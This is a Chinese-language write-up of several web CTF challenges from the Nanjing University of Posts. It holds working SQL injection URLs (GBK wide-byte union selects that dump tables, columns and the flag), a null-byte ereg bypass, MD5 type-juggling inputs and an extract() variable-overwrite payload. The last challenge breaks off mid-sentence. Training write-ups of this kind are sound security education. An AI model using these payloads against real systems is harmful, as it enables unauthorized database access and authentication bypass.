南邮CTF-WEB-write-up 教程详细解说

2023-10-27

单身一百年也没用

传送门：biu~

如图所示

单击之后，跟我说没有key
这里写图片描述

这种题目就直接用burpsuit抓包，观察请求回应信息
这里写图片描述
答案很明显了，flag出来了

Download~!

想下啥就下啥~别下音乐，不骗你，试试下载其他东西~
真·奥义·传送：点我
这里写图片描述
点击了那两个音乐链接，发现是正常的音乐文件，审查一下元素，发现了问题
这里的链接很可能存在文件包含漏洞，可以试试用download.php的base64编码看看能否取出源代码。

获得download的源码
审计代码发现这里面有一个include(“hereiskey.php”);我们继续按着前面的思路得到源码
这里写图片描述
flag到手了

COOKIE就是甜饼的意思~
地址：传送门
TIP: 0==not
这题目一进来啥也没有，根据提示，看来是要抓包分析了
这里写图片描述发现了Cookie: Login=0，前面的提示是0==not ，那么1应该就是==yes 咯
flag到手了！

MYSQL

不能每一题都这么简单嘛
你说是不是？
题目地址
这里写图片描述这题涉及到了每个网站都有的robots.txt，直接在url里面转入robots.txt

这里，提示了我们sql.php,进行代码审计吧，审计发现：intval()将变量转成整数类型,且，数值不能是1024，那么就有可能是小数咯
flag到手

sql injection 3

关于这题，大家可以看看我在简书上写的sqlmap相关该题题解：点我
 here
这里写图片描述这里看链接名字就看出来了，GBK宽字节注入啊，宽字节注入需要用到啥？%df之类的（具体的宽字节注入方面的内容这里不赘述了，大家百度一下）

经过这两个，大家可以看到，order by 2 和显示位为 “2” ，接下来可以顺利进行爆库，查询名为’sae-chinalover’的数据库的表
database

查表
这里写图片描述

相关代码

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=0x7361652D6368696E616C6F766572%20limit%200,1%23
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=0x7361652D6368696E616C6F766572%20limit%201,1%23
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=0x7361652D6368696E616C6F766572%20limit%202,1%23
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=0x7361652D6368696E616C6F766572%20limit%203,1%23

经一步步查询，得到flag在ctf4中

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,column_name%20from%20information_schema.columns%20where%20table_name=0x63746634%20limit%200,1%23
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,column_name%20from%20information_schema.columns%20where%20table_name=0x63746634%20limit%201,1%23

flag

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,flag%20from%20ctf4%23

这里写图片描述

/x00

题目地址：题目有多种解法，你能想出来几种？
这里写图片描述这题目要求我们输入一个nctf的参数值，且这个参数值必须为 1. 数字 2. #biubiubiu 就是让我们绕过判断语句

ereg的漏洞：会被%00截断及遇到%00则默认为字符串的结束
所以我们可以构造绕过语句：nctf=1%00%23biubiubiu
这里写图片描述

http://teamxlc.sinaapp.com/web4/f5a14f5e6e3453b78cd73899bad98d53/index.php?nctf=1%00%23biubiubiu

bypass again

地址：依旧是弱类型
这里写图片描述通过审计代码，发现他让你既要a！=b 又要 md5的a b值相等。

这里写图片描述

240610708跟QNKCDZO 利用不同的字符串可能产生相同的md5 绕过
a[]=1&b[]=2 利用php get 可以数组，而md5() 不能处理数组

变量覆盖

听说过变量覆盖么？
地址：题目地址
打开页面后发现有个源代码“source at /source.php” 点击进去是让我们代码审计与变量覆盖有关：经查询，变量覆盖与代码中的extract()有关，这里放出一个链接，与变量覆盖的相关知识有关，大家可以看看：点我
这里是 extract($_POST);提交参数我们可以抓包修改
这里写图片描述
payload：pass=1&thepassword_123=1

PHP是世界上最好的语言

听说PHP是世界上最好的语言
地址：题目地址
这里写图片描述
tips我们还有一个index.txt文件

代码审计了，要绕过if(eregi(“hackerDJ”, GET[id]))
并确保经过urldecode(

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系:hwhale#tublm.com(使用前将#替换为@)